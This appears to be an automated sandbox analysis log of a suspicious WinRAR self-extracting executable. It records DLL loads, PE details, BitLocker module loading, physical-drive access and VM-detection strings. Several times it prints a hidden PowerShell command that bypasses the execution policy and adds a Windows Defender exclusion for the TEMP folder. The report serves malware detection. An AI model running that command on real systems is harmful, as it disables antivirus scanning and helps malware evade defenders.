Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mmc.exe

Window found: window name: msctls_updown32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: IPt9U27NoX.exe

Static PE information: certificate valid

Source: IPt9U27NoX.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: IPt9U27NoX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IPt9U27NoX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IPt9U27NoX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IPt9U27NoX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IPt9U27NoX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IPt9U27NoX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: IPt9U27NoX.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: IPt9U27NoX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: IPt9U27NoX.exe

Source: IPt9U27NoX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IPt9U27NoX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IPt9U27NoX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IPt9U27NoX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IPt9U27NoX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\mmc.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}
Source: C:\Windows\System32\mmc.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}			Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6934125

Jump to behavior

Source: IPt9U27NoX.exe	Static PE information: section name: .didat
Source: IPt9U27NoX.exe	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F665166 push rsi; retf	0_2_00007FF71F665167
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F665156 push rsi; retf	0_2_00007FF71F665157
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFAB932D2A5 pushad ; iretd	3_2_00007FFAB932D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFAB9512316 push 8B485F95h; iretd	3_2_00007FFAB951231B

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\mmc.exe	Memory allocated: 5440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 50D0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 5410000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 55B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Memory allocated: 5CF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 7195	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6202	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3617	Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-26430

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932	Thread sleep time: -8301034833169293s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8108	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F6340BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF71F6340BC
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F64B190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF71F64B190
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F65FCA0 FindFirstFileExA,	0_2_00007FF71F65FCA0

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F6516A4 VirtualQuery,GetSystemInfo,

0_2_00007FF71F6516A4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: svchost.exe, 00000006.00000002.2362898230.0000028F3502B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: mmc.exe, 00000002.00000002.2363396353.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000002.00000002.2363396353.0000000005164000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2364623737.0000028F3A654000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1200692997.000001DECFA02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F6576D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF71F6576D8

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F660D20 GetProcessHeap,

0_2_00007FF71F660D20

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F6576D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF71F6576D8
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F652510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF71F652510
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F653354 SetUnhandledExceptionFilter,	0_2_00007FF71F653354
Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Code function: 0_2_00007FF71F653170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF71F653170

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\mmc.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}
Source: C:\Windows\System32\mmc.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\mmc.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

